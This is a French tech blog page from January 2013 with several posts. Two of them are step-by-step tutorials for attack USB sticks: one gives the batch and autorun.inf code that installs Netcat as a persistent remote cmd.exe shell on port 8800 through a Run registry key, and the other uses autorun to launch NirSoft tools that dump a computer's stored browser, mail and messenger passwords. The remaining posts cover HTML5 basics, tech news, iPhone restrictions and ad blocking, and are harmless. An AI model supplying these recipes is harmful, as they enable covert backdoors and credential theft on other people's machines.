mercredi 16 janvier 2013

Comment injecter une backdoor avec une clé USB

clé USB
Dans les articles précédents nous avons vu comment  créer une clé USB qui récupère les mots de passe d’un ordinateur.
Aujourd’hui  nous allons voir comment créer une USB qui ouvre une backdoor sur un ordinateur Windows XP.
Ce rootkit s’exécute automatiquement et crée une backdoor qui  vous permet d’accéder à votre PC à distance depuis n’importe quelle machine.  Comme d’habitude l’objectif  ce tutoriel  c’est de montrer aux dirigeants d’entreprises à quel point l’utilisation des clés USB peut être dangereux. Ce qui est valable pour les entreprises ne l’est pas moins pour les simples particuliers. icon smile Comment injecter une backdoor avec une clé USB
Alors Pour créer notre USB backdoor on doit suivre les étapes suivantes:
Étape 1
Premièrement nous allons créer un dossier sur notre clé USB puis nous allons télécharger Netcat, un utilitaire permettant d’ouvrir des connexions réseau, que ce soit UDP ou TCP.
Télécharger Netcat pour windows 
Apres on dézippe Netcat dans le dossier crée.
Etape 2
Ensuite il faut créé un fichier backdoor.bat, ce dernier  va exécuter deux instructions :
  • Copier les fichiers du netcat dans le dossier System32 sur l’ordinateur cible
  • Ajouter une valeur chaîne dans le registre pour que notre backdoor se lance a chaque démarrage de l’ordinateur
Pour cela : on doit créer un nouveau document texte avec bloc note ou autres et écrire le code ci-dessous:
1copy *.* "%SYSTEMROOT%/System32"
2REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "backdoor"  /t "REG_SZ" /d "%SYSTEMROOT%\System32\nc.exe -d -L -e cmd.exe -p 8800"

 clé USB 
Etape 3
Maintenant il nous reste de créer le fichier autorun.inf
Dans cette étape nous allons créé une nouvelle option dans la fenêtre qui apparaît a l’insertion d’une USB, qui nous permettra (une fois cliquez dessus) notre backdoor s’installe sur l’ordinateur cible.
Pour réalisez ceci on ouvre un nouveau document texte puis on insère ce code :
1[autorun]
2 
3open=backdoor.bat
4 
5ACTION="Le nom de la nouvelle option"
Enfin on enregistre le fichier sous la racine de la clé sous le nom autorun.inf
Insérer maintenant votre clé USB, un menu s’affiche et sélectionner "Le nom de la nouvelle option"
Après un redémarrage de l’ordinateur, nous pouvons à partir de n’importe quelle machine se connecter sur le poste distant avec une simple commande:
telnet *.*.*.*  8800

clé USB


.*.*.* désigne l’adresse IP de la machine distant qui vous faut remplacer et 8800 c’est le port utiliser pr se connecter.
Faites-en bon usage.  icon biggrin Comment injecter une backdoor avec une clé USB

Création d’une clé USB rootkit

clé usb 32
Aujourd’hui nous allons voir comment créer une clé USB qui récupère les mots de passe d’un ordinateur. Ce rootkit s’exécute automatiquement et récupère la plupart des mots de passe stocker sur votre ordinateur. Il est vraiment très utile surtout quand on a perdu ses mots de passe.
Pour créer notre rootkit on doit suivre les étapes suivantes:

Étape 1

Nous allons dans un premier temps télécharger quelque logiciels qui nous permettent de déchiffrer les mots de passe des applications les plus courantes. Toutes ces applications sont issues du site Nirsoft (http://www.nirsoft.net/).
  • MessenPass
  • Mail PassView
  • ChromePass
  • IE Passview
  • PasswordFox
  • Protected Storage PassView
  • Network Password Recovery
  • WirelessKeyView
clé usb 32
Voici le Packs complets :  http://www.multiupload.nl/W9C4LACNTW
puis nous allons placez tous les fichier .exe  sur notre clé USB.

Étape 2

Ensuite il nous faut créé un fichier launch.bat qui va ouvrir les programmes de récupération de mot de passe et il va  stocker les résultats dans un fichier texte.
Pour cela : on doit créer un nouveau document texte avec bloc note ou autres et écrire le code ci-dessous.
1start mspass.exe /stext dossier1/mspass.txt
2start mailpv.exe /stext dossier/mailpv.txt
3start pspv.exe /stext dossier1/pspv.txt
4start iepv.exe /stext dossier1/iepv.txt
5start PasswordFox.exe /stext dossier1/PasswordFox.txt
6start ChromePass.exe /stext dossier1/ChromePass.txt
Attention a bien vérifier que les noms de fichiers correspondent bien aux noms de launch.bat .
Comme vous avez pu le voir dans les lignes ci dessus, lorsque le logiciel sera exécutez , ces logs seront envoyé dans un dossier appelé dossier1. Il nous faut donc créé un nouveau dossier.

Étape 3

Maintenant nous devons créer le fichier autorun.inf
Lorsque vous insérez votre cléf USB généralement une fenêtre apparaît en nous demandant ce que l’on désire faire !
Dans cette étape nous allons créé une nouvelle option dans cette fenêtre , qui nous permettra ( une fois cliquez dessus ) de récupérez les mots de passes du pc et de les stockés dans le dossier créé dans l’étape 2 .
Pour réalisez ceci on ouvre un nouveau document texte puis on insère ce code :
1[autorun]
2 
3open=launch.bat
4 
5ACTION="Le nom de la nouvelle option"
Puis on enregistre sous : autorun.inf
Notre rootkit est maintenant près, il ne reste plus qu’à le tester.

mardi 15 janvier 2013

Compresser et réduire le poids d’une image en un clic

Vous voulez avoir une fonction supplémentaire dans votre système d’exploitation windows XP, qui vous permet de compresser une photo en cliquant sur le bouton droit de la souris ?
Oui c’est possible ! Téléchargez PowersToys puis exécutez ce logiciel, l’installation ce fait automatiquement !
Les Power Toys sont de petits utilitaires choisis par Microsoft afin d’optimiser et d’apporter de nouvelles fonctions à Windows.
Après l’installation,  cliquer avec le bouton droit de la souris  sur une image, vous constaterez une nouvelle fonction : « Resize Pictures »  qui vient d’être ajouté ! Vous n’avez plus qu’à choisir la dimension, et par la même, le poids de votre image, enfin cliquer sur « OK » et voila vous avez une nouvelle image compressé.
compresser image Compresser et réduire le poids dune image en un clic

dimanche 13 janvier 2013

Aaron Swartz, le père du RSS s’est suicidé à l’âge de 26 ans

Aaron Swartz, hacker extraordinaire et  co-fondateur du réseau social Reddit, a été retrouvé mort pendu à son domicile à Brooklyn vendredi soir, selon les services médicaux de New York.
Le jeune prodige avait participé à la création du collectif Demand Progress et mené en 2011 une campagne victorieuse aux Etats-Unis contre le projet de loi anti-piratage SOPA (Stop Online Piracy Act), qui avait suscité une forte opposition chez les principaux acteurs d’internet.
Ce génie de l’informatique, qui était l’un des créateurs du format de flux RSS à l’age de 14 ans, devait comparaître le 1er avril devant la justice. Il était accusé d’avoir volé en 2011 des millions d’articles scientifiques et littéraires à JSTOR, un service d’archivage en ligne de publications universitaires et scientifiques, accessible uniquement par abonnement.
Aaron Swartz risquait jusqu’à 35 ans de prison et un million de dollars d’amende.
A la suite de son arrestation en 2011 à Boston, son organisation de lutte contre la censure Demand Progress avait protesté en disant que ces poursuites «n’avaient pas de sens». «C’est comme essayer de mettre en prison quelqu’un qui aurait parcouru rapidement trop de livres dans une bibliothèque», a déclaré le directeur de cette organisation David Segar. La famille et les amis du militant reprochent à la justice et au MIT, à l’origine des poursuites, d’avoir une certaine responsabilité dans ce suicide.
aaron swartz sopa Aaron Swartz, le père du RSS sest suicidé à lâge de 26 ans
Swartz proteste contre la loi SOPA / PIPA
Aujourd’hui, tout le monde se demande si Aaron ne s’est pas tué parce qu’il ne voulait pas aller en prison. Peut-être. Mais Aaron souffrait aussi de dépression depuis de nombreuses années«, écrit sur Boingboing.net Cory Doctorow, militant de l’internet et ami du jeune homme, «Aaron en avait parlé publiquement et en parlait avec ses amis».
Source: (afp/Le Matin)

Ce qu’il faut savoir pour débuter en HTML5

HTML5, aujourd’hui tout le monde en parle, tout d’abord pour ceux qui ne savent pas, l’HTML pour HyperText Markup Language, n’est pas un langage de programmation, mais un langage de balisage.
Steve Jobs a dit pour Apple:
« Apple ne supporte pas Flash parce qu’il est trop bogué. Chaque fois qu’un Mac plante, le plus souvent c’est à cause de Flash. Personne n’utilisera plus Flash. Le Monde est en train de se tourner vers HTML 5. »
(Apple Town Hall Meeting, fin Janvier 2010).

HTML5 c’est quoi ?html5 Ce quil faut savoir pour débuter en HTML5

  • HTML5  est Une évolution de l’HTML 4.01 (et de l’XHTML 1.0).C’est à dire que tout ce que vous savez faire en HTML reste valide.
  • HTML5 intègre des formats auparavant séparés: Web Forms, DOM, XHTML et ajoute des balises multimedia: canvas, audio, video..
  • HTML5 est implémenté progressivement par tous les navigateurs.
  • HTML5 est le fruit des travaux du W3C et du WHATWG

Le W3C et le WHATWG  ?

Le World Wide Web Consortium, abrégé par le sigle W3C, est un organisme qui s’occupe de standardiser le web à but non-lucratif, fondé en octobre 1994. Elle est constituée d’un ensemble de membres actifs qui réfléchissent à l’évolution des standards tels que l’HTML et le CSS.
Le Web Hypertext Application Technology Working Group (ou WHATWG) est une collaboration non officielle des différents développeurs de navigateurs web ayant pour but le développement de nouvelles technologies destinées à faciliter l’écriture et le déploiement d’applications à travers le Web.

Les nouveautés dans HTML5

Un code plus légers

Grâce a html5 , certaines balises ont été modifié et simplifiées afin d’alléger le code d’une application web.
Exemple : Un nouveau Doctype
Doctype, la première ligne d’une page web qui indique la méthode de rendu standard au navigateur en de la balise <html>, de la balise <meta> de l’encodage des caractères, et des balises de feuilles de style et de script.
Alors qu’auparavant on avait ce genre de code :
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" >

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<link rel="stylesheet" type="text/css" href="design.css" />

<script type=”text/javascript” src=script.js"></script>

</head>

<body>

</body>

</html>
En HTML5, On a
<!DOCTYPE html>

<html lang="fr">

<head>

<meta charset="utf-8" />

<link rel="stylesheet" href="design.css" />

<script src="script.js"></script>

</head>
C’est plus sympa n’est ce pas icon smile Ce quil faut savoir pour débuter en HTML5 , De manière générale, on peut dire que l’HTML5 est beaucoup plus léger e sur l’écriture du code HTML.
Il est à noter que Doctype peut être en majuscules ou minuscule ou une combinaison des deux  c’est-à-dire que la déclaration du Doctype n’est pas sensible à la casse.

Les nouvelles balises sémantiques

L’HTML5 introduit également un ensemble de nouvelles balises afin de donner plus de sens à nos pages web.
Je ne vais pas détailler toutes les nouvelles balises, mais uniquement celles qui présentent un grand intérêt et qui sont à peu près facilement compréhensible.Par exemple, avant on utilisait une <div> avec un id=”header” pour représenté l’entête d’une page web mais avec html5 nous pouvons utiliser tout simplement la balise <header>. Parmi d’autres balises sémantiques on trouve :
  • <article> représente un texte provenant d’une source externe, comme par exemple un article de journal, de blog ou de forum.
  • <header >: spécifie une introduction, ou un groupe d’éléments de navigation pour le document.
  •  <footer> : définit le pied de page d’un article ou un document. Contient généralement le nom de l’auteur, la date du document a été écrit et / ou ses coordonnées.
  • <nav> Typiquement, dans cette balise on va trouver des liens(menu) qui permettent d’accéder soit à d’autres pages du site, soit à différents contenus de la page.
<nav>

<h1>Navigation</h1>

<ul>

<li><a href="/Accuei/">Accueil</a></li>

<li><a href="/actualites/">Actualités</a></li>

</ul>

</nav>
Ces noms n’ont pas été choisis au hasard. Google a fourni au W3C les chiffres de la fréquence d’utilisation de tous les id utilisés sur les sites indexés par le moteur de recherche, et ceux-ci font partie de ceux qui sont les plus employés.
Voyons maintenant quelles sont les 3 nouvelles balises super-stars.

Les balises multimédia

  • <video>
Cette balise permet d’insérer du contenu multimédia facilement dans la page, avec des boutons Lecture, Pause, une barre de progression, du volume… c’est une grande avancée. Ça évite d’avoir à utiliser un plugin (Flash, Java, Quicktime, etc.)
html5 video lecteur copie Ce quil faut savoir pour débuter en HTML5
  • <audio>
Pour insérer un fichier audio dans une page HTML5,  il suffit d’insérer les lignes suivantes dans une page HTML5
<audio src="nomdufichier.mp3">
</audio>
Simple non ?
Il existe encore un ensemble de d’options permettant d’ajouter quelques fonctionnalités .
Nous pouvons voir sur l’image ci-dessous que chaque navigateur utilise un design qui lui est propre pour styliser son lecteur. Dans tous les cas il vous est possible de créer votre propre design si vous préférez un rendu uniforme quel que soit le navigateur utilisé.
audio Ce quil faut savoir pour débuter en HTML5
  • <canvas>
Il permet de dessiner du bitmap en Javascript. C’est en quelque sorte la super-star du HTML5.  Grâce à son API 2D couplé avec le standard WebGL de rendu graphique 3D, on obtient des résultats impressionnants au sein même du navigateur. C’est dans cette zone que sont réalisées des animations ou des jeux.
UNSET Ce quil faut savoir pour débuter en HTML5

Des formulaires encore plus beaux

HTML5 définit plus d’une douzaine de nouveaux types d’entrée que vous pouvez utiliser dans vos formulaires.
<ol style="text-align: justify;">
<li> <input type="search"> pour les boîtes de recherche</li>
<li><input type="number"> pour les spinbox</li>
<li><input type="range"> pour les curseurs</li>
<li> <input type="color"> des nuanciers</li>
<li><input type="tel"> des numéros de téléphone</li>
<li><input type="url"> pour les adresses Web</li>
<li><input type="email"> pour les adresses e-mail</li>
<li><input type="month"> pendant des mois</li>
<li> <input type="week"> pendant des semaines</li>
<li><input type="time"> pour les horodateurs</li>
</ol>
Ces nouvelles valeurs permettent notamment, pour des navigateurs web de vérifier les données entrées avant leur envoi au serveur, mais également c’est très important pour la navigation depuis un smartphone, qui affichera un clavier adapté selon le type de contenu.
Par exemple, pour le champ input suivant :
<input type="tel"/>
On aura le clavier suivant sur un iPhone
iphone Ce quil faut savoir pour débuter en HTML5
Pour le champ suivant :
<input type="url"/>
Un iPhone affichera ce clavier adapté aux URLs :
clavier Ce quil faut savoir pour débuter en HTML5

Application web hors connexion

Utiliser les applications Web hors ligne est la tendance majeure dans ce domaine depuis 2008.
La partie la plus intéressante d’HTML5 réside définitivement dans ses possibilités de stockage hors ligne . Il est possible d’utiliser un site web en mode hors connexion si celui-ci  à accepté de stocker des donnés sur son ordinateur via le bandeau s’affichant en haut de page :


La géolocalisation

La g%C3%A9olocalisation Ce quil faut savoir pour débuter en HTML5
La géolocalisation est l’art de déterminer où vous êtes dans le monde et (éventuellement) partager cette information avec des personnes de confiance.
Il est possible grâce à l’API de géolocalisation d’accéder aux coordonnées de l’utilisateur si celui-ci a accepté de partager sa position .
Voici un code minimaliste pour utiliser cette API
<!DOCTYPE html>
<html>
<head>
<title>api geolocalisation "Ma Position"</title>
<script type="text/javascript">
function getPosition(position)
{
var infoposition = "Latitude: "+position.coords.latitude+"<br />";
infoposition += "Longitude: "+position.coords.longitude+"<br />";
infoposition += "Altitude: "+position.coords.altitude+"<br />";

document.getElementById("myposition").innerHTML = infoposition;
}

function myPosition()
{
navigator.geolocation.getCurrentPosition(getPosition);
}
</script>
</head>
<body>
<a href="#" onClick="myPosition()">Afficher ma position</a>
<div id="myposition"></div>
</body>
</html>
Résultat:
Latitude: 37.41857
Longitude: -122.08769
Altitude: 42

Problèmes de sécurité avec HTML 5

SeguridadWeb Ce quil faut savoir pour débuter en HTML5
Les nouvelles capacités offertes par HTML 5 sont malheureusement autant d’opportunités offertes aux logiciels malveillants pour s’infiltrer dans la vie des internautes.
Les éditeurs de navigateurs en sont conscient et font le maximum pour en tenir compte dans le développement. Parmi les vulnérabilités du HTML5  il y a :
Le mode hors connexion
Un pirate peut accéder au contenu des variables de stockage local, a non seulement accès aux données personnelles, mais il peut y injecter ses propres données. La mise en cache d’une application sur le poste utilisateur fait qu’il est plus facile de l’infecter, elle devient un cheval de Troie derrière la firewall de l’ordinateur.
Géolocalisation
L’espion peut savoir où vous vous trouvez à n’importe quel moment. Pour un cambrioleur, cela permet de savoir si vous êtes loin de chez vous.
JavaScript
Il devient de plus en plus présent grâce aux capacités d’application Web que fournit HTML 5. Les utilisateurs ne pourront plus le désactiver, aussi devrait-il sécuriser.

En conclusion…

ms ressources humaines Ce quil faut savoir pour débuter en HTML5
Alors pour conclure j’aimerais vous dire que vous pouvez utiliser l’HTML5 dès maintenant !  Et j’en rajoute une couche : on peut vraiment l’utiliser aujourd’hui ! (Une gallery des sites HTML5)
l’HTML5 ce n’est pas le futur, c’est le présent, alors utilisez HTML5 allez-y, qu’est-ce que vous attendez ? Sans vous HTML5 n’existerait pas ou n’existera pas.
Déjà des sites comme Youtube, Google, Apple, ou Gmail l’utilise sur leurs projet, vous pouvez regardez simplement le code source de ces sites !  L’HTML5 arrive doucement mais sûrement. Donc il faut commencer  à se former le plus tôt possible, pour avoir une longueur d’avance.
Et pour vous aidez voici un document très pratique à télécharger , qui répertorie toutes les balises HTML5, leur description et leurs attributs. Publié dans Smashing Magazine.
  A bientôt mes amis(e) ! icon biggrin Ce quil faut savoir pour débuter en HTML5

La biographie de Steve Jobs

La société éditrice du livre Steve jobs Simon & Schuster a annoncé   un simple changement sur la date de la sortie de l’ouvrage il sera plus longue qu’annoncé précédemment. Elle totalisera 656 pages.
L’auteur,  a expliqué récemment qu’un chapitre serait ajouté à propos de la démission de l’homme de ses fonctions de CEO d’Apple.
Le livre peut être pré-commandé dès aujourd’hui sur Amazon.  Rappelons que cette biographie est officielle, et approuvée par Steve en personne. Ce travail est fait par le célèbre écrivain Isaacson Walter, qui a écrit une biographie de Benjamin Franklin et d’Albert Einstein. Isaacson a fait beaucoup d’entretiens avec des centaines de personnes et les proches de Steve Jobs pour écrire ce fameux livre, en plus de 40 entretiens avec Steve Jobs lui-même.

Une nouvelle faille Zéro-day Java permet de prendre le contrôle total d’un PC

Une nouvelle faille 0-day vient d’être découverte hier dans le logiciel Java. Toutes les versions de Java sont affectées.
Une faille extrêmement critique qui n’est pas encore corrigée. Et qui permet à une personne mal intentionnée de prendre le contrôle total de l’ordinateur d’une victime.
En effet, lorsque vous visitez une site infecté, cette faille autoriserait l’installation d’un code arbitraire avec l’aide d’un Applet Java intégré dans une page Web par exemple.
L’exploit est à présent intégré dans le framework Metasploit, le rendant disponible pour des tests internes. Les autres kits de piratage, en plus de Blackhole, qui intègrent cet exploit sont Nuclear et RedKit
Le créateur de Blackhole, qui utilise le surnom de « panse », a annoncé hier sur plusieurs forums que la faille Java zero-day était «un cadeau du Nouvel An » aux clients qui utilisent son kit d’exploit.
Voici une vidéo qui montre comment exploiter la faille 0-day java avec Metasploit sous Windows 8 :
Puisqu’il n’y a pas de patch disponible, je vous recommande de désactiver le plugin Java sur votre navigateur.
 

Puisqu’il n’y a pas de patch disponible, je vous recommande de désactiver le plugin Java sur votre navigateur.

jeudi 10 janvier 2013

Le plus petit ordinateur au monde

Le constructeur xi3 dévoilait ses nouvelles machines ultra-compactes dans le plus grand salon électronique du monde (CES). Xi3 est un ordinateur équipé d’un processeur Athlon Dual Core à peine 10 cm de coté !
La société Xi3 est spécialisé dans les ordinateurs minuscules et aussi les serveurs. Les Z3R0 sont des serveurs consommant 1Watt capables de faire tourner Windows et tout autre système x86.


Il ressemble à un petit cube à l’esthétique agréable, ils possèdent une carte graphique HDMI supportant le DirectX , de 2 ports eSATA, une carte réseau, une carte son et 6 ports USB 2.0 .
Xi3 ordinateur petit Le plus petit ordinateur au monde
Chaque module coûte 250 dollars. Pour plus d’info, rendez vous sur: http://xi3.org

Mark Zuckerberg ne sait plus coder !

Le Mark Zuckerberg, nous avons vu sur le film était vraiment un génie de la programmation, mais apparemment il a perdu un peu de son mystère et il ne sait plus coder.
Au moins c’était clair dans une interview fait par le New York Magazine avec Aboukhadijeh Feross, connu dans le milieu du Web pour être le créateur de Youtube Instant.  Mais avant ça, il a fait un petit détour chez Facebook, en tant que stagiaire.
Feross Aboukhadijeh a livré donc une anecdote concernant le créateur du réseau social le plus puissant du monde.
Il ne code plus beaucoup pour Facebook, tout comme Steve Jobs n’a jamais écrit lui-même de logiciel pour l’iPhone. Mais, comme l’équipe ajoutait les touches finales au produit, Zuckerberg a déclaré qu’il voulait écrire quelques lignes. Tout le monde était là ‘Ohhhh, Zuck va coder’. Quelqu’un lui a donné un bogue assez simple à résoudre, avec un lien vers une image ou quelque chose comme cela, et il s’est mis à la tâche. Cinq minutes ont passé, puis vingt minutes, puis une heure. Ça lui a pris près de deux heures pour faire quelque chose qui nous aurait demandé à nous, ingénieurs, seulement 5 minutes. C’était comme un lutteur retraité revenant pour un dernier combat, en souvenir du bon vieux temps, et réalisant qu’il a perdu plus de ses aptitudes qu’il ne pensait. Raconte Aboukhadijeh.
Espérons que cela était juste un mauvais jour pour Mark Zuckerberg. icon biggrin Mark Zuckerberg ne sait plus coder !

Savoir qui m’a supprimé sur Facebook

Les vrais amis, c’est pour la vie. Mais pas forcément sur Facebook. icon smile Savoir qui ma supprimé sur Facebook  Il vous arrive de voir de jours en jours votre nombre d’amis Facebook diminuer tout seul. Et vous aimeriez répondre à cette question : Mais qui a osé me supprimer de sa liste d’amis ? icon sad Savoir qui ma supprimé sur Facebook

C’est exactement ce que permet de faire Unfriend Finder, un petit script qui s’intègre parfaitement à l’interface de Facebook puis il rajoute une rubrique « Amis en moins » à votre profile et vous permet de voir vos demandes d’ajout encore en attente et surtout, qui vous a retiré de sa liste d’amis. A chaque nouvelle suppression, vous recevez une notification.
Unfriend Finder analyse les listes de contacts au moment de l’installation pour faire apparaître clairement le nombre d’amis perdus au fil du temps et de son utilisation.  Il propose d’être informé de toute suppression de compte de vos contacts ou des demandes d’amis toujours en attentes ou refusées.
unfinder Savoir qui ma supprimé sur Facebook
Capture du Unfriend Finder
Il fonctionne sur tous les navigateurs sauf sur Internet Explorer.
Si vous utilisez Firefox, il vous faut d’abord installer GreaseMonkey une extension  permettant d’exécuter des scripts.
Télécharger Unfriend Finder
Intéressant non ? icon biggrin Savoir qui ma supprimé sur Facebook

Comment bloquer la publicité sur votre smartphone Android ?

Rien de plus embêtant que les publicités intempestives qui sont définitivement partout. Ils sont sur nos téléviseurs, dans la rue, en ligne et maintenant sur nos Smartphones Android. Pourtant il est assez simple de les bloquer.
AdBlock Plus est un petit logiciel bien connu des internautes: il empêche l’apparition des fenêtres publicitaires dans le navigateur. Son éditeur, vient de dévoiler une version pour Android. Elle prend la forme d’une application à télécharger et à installer sur votre smartphone ou votre tablette. Sur les terminaux équipés d’Android ,  Adblock  bloque toutes les publicités de votre téléphone Android  lorsque vous surfer en wifi sans la nécessité d’être en mode Root.
adblockplus Comment bloquer la publicité sur votre smartphone Android ?
Adblock Plus bloque en général:  les publicités mobiles, publicités vidéos  bannière, notification publicitaires, les affichage de publicité, les publicités HTML5 et bien plus.
 Vous pouvez le télécharger dès maintenant depuis le Google Play Store.

mardi 8 janvier 2013

Un hacker algérien recherché par le FBI arrêté à Bangkok

La police thaïlandaise a arrêté un hacker algérien recherché par le FBI pour cybercriminalité, une activité qui lui aurait rapporté des dizaines de millions de dollars.
Hamza Bendelladj, 24 ans, diplômé en informatique en Algérie en 2008, a été arrêté dimanche soir alors qu’il tentait de transiter par l’aéroport Suvarnabhumi de Bangkok en provenance de la Malaisie.
Il aurait piraté des comptes privés dans 217 banques et sociétés financières à travers le monde, « Avec une seule transaction, il pourrait gagner de 10 à 20 millions de dollars », a déclaré le lieutenant-général Phanu « Il a voyagé à travers le monde en première classe et mène une vie de luxe », affirme ce responsable thaïlandais.
La police a confisqué deux ordinateurs portables, une tablette, un téléphone satellite et certain disques durs externes. Ce sont les principaux outils du hacker algérien.
hacker hamza bendelladj Un hacker algérien recherché par le FBI arrêté à Bangkok
Bendelladj sera extradé vers l’État américain de Géorgie, où un tribunal a émis un mandat d’arrêt contre lui. « Je ne suis pas dans le top 10, peut-être juste parmi les 20 ou 50″, a déclaré en riant le suspect algérien. « Je ne suis pas un terroriste », a-t-il ajouté.

dimanche 6 janvier 2013

Prêtez votre iPhone sans risque

Si vous prêtez un appareil sous iOS 5.1 et que vous souhaitez le « verrouiller », voici comment faire. Accédez à l'écran Réglages et appuyez sur Général, puis sur Restrictions. Appuyez sur Activer les restrictions, puis tapez à deux reprises un code à quatre chiffres qui protègera vos changements (ce code peut être différent de celui vous servant à verrouiller l'iPhone).
Indiquez ensuite, en plaçant les curseurs sur 0 ou 1, si vous autorisez ou interdisez l'accès à différents logiciels ou services (Safari, YouTube...). Les icônes des logiciels que vous avez exclus disparaîtront de l'interface.

Contrôlez l'accès à l'App Store

Applis
agrandir la photo
Vous voulez protéger les applis que vous avez installées. Dans l'écran des restrictions ci-dessus, mettez à zéro le curseur Suppr. d'apps.
Désormais, un clic prolongé sur une icône permet toujours de la placer dans un dossier, mais le petit X de suppression a disparu.
 
 

Filtrez les contenus

Films
agrandir la photo
Le mode Restrictions vous permet également de filtrer les contenus (films, applis...) que l'utilisateur occasionnel est autorisé à télécharger. Dans l'écran Restrictions, descendez jusqu'à la section Contenus autorisés.
Choisissez une catégorie, par exemple Films et choisissez une limite d'âge, par exemple 12 ans. Les films d'une catégorie plus restrictive (interdits aux moins de 16 ou de 18 ans), seront automatiquement bloqués. Validez.
D'autres paramètres vous permettent de bloquer les jeux en ligne et de contrôler l'activation des fonctions de localisation. Enfin, il est possible d'interdire toutes modifications de vos comptes.
 

Créez un compte sans carte bancaire

Gratuit
agrandir la photo
Vous pouvez créer et activer un compte iTunes spécial et ne lui associer aucun moyen de paiement. Avec un tel compte, un utilisateur ne pourra télécharger que des applis gratuites ou des mises à jour (toujours gratuites) d'applis payantes. Rien à craindre, donc, pour votre compte en banque !
Commencez, avec votre compte usuel, par télécharger l'application Remote sur l'App Store. Puis ouvrez l'écran de Réglages, cliquez sur Store, sur votre identifiant et sur Déconnexion.
Accédez maintenant à l'App Store sur votre appareil. Sélectionnez une appli gratuite et cliquez sur Gratuite, puis sur Installer l'app.
Sélectionnez Créer un nouvel identifiant Apple, choisissez France, cliquez sur Suivant, acceptez les conditions générales de vente. Saisissez une adresse e-mail valide, et remplissez le questionnaire.
A la question Mode de payement, choisissez Aucun et validez. Ouvrez alors le mail que vous avez reçu et cliquez sur le lien qu'il contient pour activer votre compte.
Vous pouvez désormais installer toutes les applis, musiques et ebooks gratuits.

vendredi 4 janvier 2013

iWatch : la montre Apple disponible en 2013 ?

iPhone 5, iPad 5 voire iTV. La firme de Cupertino pourrait très bientôt lancer un nouveau produit : l’iWatch.
Selon les sources du Daily Mail, il s’agirait d’une montre intelligente signée Apple. Elle donnera l’heure, bien sûr. Mais Apple ne va sans doute pas en rester là. La montre permettrait de contrôler l’iPhone, l’iPad ou l’iPod Touch (et peut-être même l’iMac et les MacBook).
En effet, la montre Apple disposerait d’une connexion bluetooth qui permettrait à la fois de recevoir l’heure, mais aussi d’utiliser un GPS, de lire ses mails ou encore de recevoir ses SMS. Bref, une sorte d’iPhone que l’on pourrait porter au poignet.
L’iWatch serait donc équipé du système d’exploitation iOS 6. On pourrait même y installer des applications spécifiques comme la météo…
Pour le moment, cette information n’a encore rien d’officiel, mais le lancement de l’iWatch pourrait survenir avant celui de l’iPhone 6 des sources de constructeurs chinois.
iwatch apple iWatch : la montre Apple disponible en 2013 ?
Apple ne serait pas le premier constructeur à s’engager sur le terrain des montres intelligente. Il existe déjà des montres ressemblant à iWatch. C’est le cas de la SmartWatch de Sony la Motoactv de Motorola, dont le fonctionnement repose sur Android.